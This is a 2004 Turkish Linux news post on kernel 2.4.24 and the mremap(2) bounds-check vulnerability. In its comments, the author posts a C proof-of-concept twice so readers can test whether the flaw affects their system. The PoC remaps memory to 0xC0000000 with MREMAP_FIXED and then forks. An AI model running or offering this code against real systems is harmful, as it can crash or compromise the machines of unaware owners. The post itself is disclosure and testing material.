Kernel 2.4.24 Çıktı

0
bahadirkandemir
bahadirkandemir
6 Ocak 2004 , 1 dakika okuma süresi
Kernel'in bellek yönetim kodunda, mremap(2) sistem çağrısındaki hatalı sınır kontrolünden kaynaklanan bir güvenlik zayıflığı bulundu.

mremap sistem çağrısı, sanal bellek alanlarının adreslenebilir boşluklarını taşımak ve boyutlarını değiştirme imkanı sağlıyor.

Duyurunun tamamı: http://isec.pl/vulnerabilities/isec-0013-mremap.txt
linux
3
Linkedin Facebook Twitter Google plus

Görüşler

bahadirkandemir
0
bahadirkandemir
NOT: Bu zayıflığın 2.2, 2.4 ver 2.6 serilerinde olduğu belirtilmişti ancak, zayıflığı keşfeden güvenlik grubu bu açığın MREMAP_FIXED bayrağını desteklemeyen 2.2 serilerinde olmadığını önemli güvenlik listelerinde duyurdu.

Kernel 2.6.0'da aynı zayıflığın olduğu duyurulmuştu, 2.6.1-rc1'de zayıflığın giderilmediği, 2.6.1-rc2'de giderildiği ek bir açıklama ile duyuruldu.

Zayıflığı test etmek isteyenler aşağıdaki kodu deneyebilir:

#include
#include
#include
#include

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
realist
0
realist
ne #include ediyoruz?
hangi #include ?
bahadirkandemir
0
bahadirkandemir
Sanırım < ve > karakterleri sorun yarattı. 2 kere önizleme yapmamdan kaynaklandı.

----------------------------------------------

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
Görüş belirtmek için giriş yapın...

İlgili Yazılar

Linux Komikleri :)
butch
25 Mayıs 2004, 1 dakika okuma süresi

Linux karikatürlerine ne dersiniz. http://comic.escomposlinux.org/ adresinde haftalık yayınlanan karelerden birkaç örnek Bugzilla , The Matrix Rebooting, Knoppix

GNU/Linux: Büyük ağların yönetimi için yeterli mi?
FZ
1 Ağustos 2005, 3 dakika okuma süresi

Debian GNU/Linux Türkçe kullanıcılar tartışma listesinde ilginç bir e-postaya denk geldim ve paylaşmak istedim. Uzun yıllardır hem GNU/Linux hem de MS Windows sistemlerle ugraştığını, halihazırda 60 sunucu ve 2000'e yakın istemcisi bulunan, 4 ülkeye ve Türkiye'de de 6 farklı yere dağılmış bir bilgisayar ağının danışmanı olduğunu belirten Muhlis Öztürk, GNU/Linux sistemlerle MS Windows sistemleri yönetilebilirlik açısından kıyaslarken bakın neler diyor (vurgular bana ait):

Gömülü Sistemlerde Linux Kullanımı
anonim
9 Haziran 2003, 1 dakika okuma süresi

Gömülü sistemlerde Linux kullanımı ve bu amaçla bir Linux dağıtımı oluşturma konulu hazırladığım belgeyi, henüz tamamlanmamış olsa da, birilerine faydalı olabilir düşüncesiyle http://murat.debian-tr.org/doc/embed adresine koydum. Umarım gerçekten birilerinin işine yarar.

Editörün Notu: Keşke herkes böyle belge hazırlasa ;-)

Yerelleştirme grupları sizi bekliyor
anonim
15 Ekim 2004, 1 dakika okuma süresi

Türkiye'de genelde serbest yazılım, özelde Linux'un masaüstünde yaygınlaşması, daha alt seviyelere indirilmesi pek çoğuna göre değişik ölçütlere bağlı. Bunlar masaya yatırıldığı zaman herhalde olayın sosyolojik boyutundan teknolojisine, politikasından psikolojisine, insan-bilgisayar etkileşiminden yerelleştirmesine kadar pek çok noktada görüş bildirebilecek sayısız (Türk) uzman var.

Slackware 8.0 çıktı
conan
1 Temmuz 2001, 1 dakika okuma süresi

Slackware'in en yeni sürümü dün piyasaya çıktı. Dağıtım XFree86 4.1.0, kernel olarak 2.2.19 ve 2.4.5, KDE 2.1.2, GNOME 1.4, glibc 2.2.3 gibi paketleri içinde barındırıyor.
Detaylı bilgi için:
Slackware sitesi
Linuxtoday